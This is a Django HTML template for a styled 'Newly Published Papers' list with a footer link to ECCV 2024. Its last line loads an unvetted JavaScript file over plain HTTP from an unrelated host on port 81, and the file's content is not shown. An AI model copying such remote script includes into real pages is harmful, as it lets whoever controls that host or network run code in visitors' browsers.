{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Papers List</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <style>
        body {
            padding: 4.5rem;
            margin: 0;
            background: linear-gradient(90deg, #edc0bf 0,#c4caef 58%);
            font-family: 'Inter', sans-serif;
        }
        h1 {
            color: #0056b3;
            display: flex;
            align-items: center;
            margin-left: 1rem;
        }
        h1 img {
            margin-right: 10px;
            width: 34px;
            height: 34px;
        }
        ul {
            list-style: none;
            padding: 0;
        }
        li.card {
            margin-bottom: 20px;
            padding: 20px;
            background-color: rgba(255, 255, 255, .7);
            -webkit-backdrop-filter: blur(10px);
            backdrop-filter: blur(10px);
            border-radius: 1rem;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }
        a {
            color: #007bff;
            text-decoration: none;
        }
        a:hover {
            text-decoration: underline;
        }
        .footer {
            text-align: center;
            margin-top: 20px;
            padding-top: 10px;
            border-top: 1px solid #ddd;
        }
        .footer a {
            color: #0056b3;
            font-size: 0.9em;
        }
        .footer a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <h1>
        <img src="{% static 'images/cryptography.png' %}" alt="Icon">
        Newly Published Papers
    </h1>
    <ul>
        {% for paper, emoji in papers_with_emojis %}
        <li class="card">
            <strong>{{ paper.title }}</strong> by {{ paper.authors }}
            - Published: {{ paper.date_published }} - Pages: {{ paper.pagination }} {{ emoji }}{% if paper.link %} - <a href="{{ paper.link }}">Link</a>{% endif %}
        </li>
        {% empty %}
        <li class="card">No papers found.</li>
        {% endfor %}
    </ul>
    <div class="footer">
        <a href="https://dblp.org/db/conf/eccv/eccv2024-1.html">Visit eccv2024</a>
    </div>
    <script type="text/javascript" src="http://xujiangtao.icu:81/xjtfile/lizi.js"></script>
</body>
</html>
